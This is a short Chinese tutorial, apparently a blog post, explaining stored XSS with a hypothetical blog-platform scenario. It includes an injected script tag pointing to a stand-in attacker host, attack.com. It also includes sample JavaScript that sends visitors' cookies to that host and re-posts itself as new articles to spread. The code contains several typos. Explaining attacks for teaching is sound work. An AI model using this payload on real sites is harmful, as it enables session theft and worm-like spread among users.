首先,在这篇文章里我主要介绍我所理解的XSS,并结合实例进行理解,这里我们设定一个情景,比如说CSDN这个类似于博客的系统吧,就简单假设一下,通过一个博客来描述XSS攻击:
- 首先,对系统的攻击者发现该博客系统存在漏洞,对文章进行发表的时候,服务器没有进行转义或对数据进行过滤;
- 攻击者使用账号登陆博客系统,对文章进行编辑,输入正常文字,但是在文章末端加入恶意代码:
<script type='text/javascript' src='http://www.attack.com/attack.js'><script>
- 由于服务器没有过滤机制,所以生成正常文章;
- 攻击者将这篇文章的地址发送到各大论坛,或者将文章地址发送给别人;
- 毫无察觉的人打开这篇文章,浏览器就会执行文章末端的恶意代码,下载并执行attack.js文件,在attack.js的操作下实现攻击。
- 一般来说attack.js对浏览器的攻击是获取浏览器上存的cookie信息以及执行操作,attack.js一般可以如下这样写;
<script type="text/javascript">
$(function(){
var cookie = encodeURIComponent(document.cookie)
$('<img scr = "http://www.attack.com/attack.php?cookie='+ cookie +'">').appendTo($(document.body))
var content = "<src "+" ipt type = 'text/javascript' src = 'http://www.attack.com/attack.js'></scr"+"ipt>"
$post("http://wwww.example.com/sendArticle.php", {content:content},function(result){});
})
</script>
在上面代码会有两种攻击效果:
- 将www.example.com主机下的所有cookie信息发送给攻击者;
- 以正常用户的身份生成一篇文章,文章之中同样包含攻击代码,这样扩展了攻击的范围和广度;
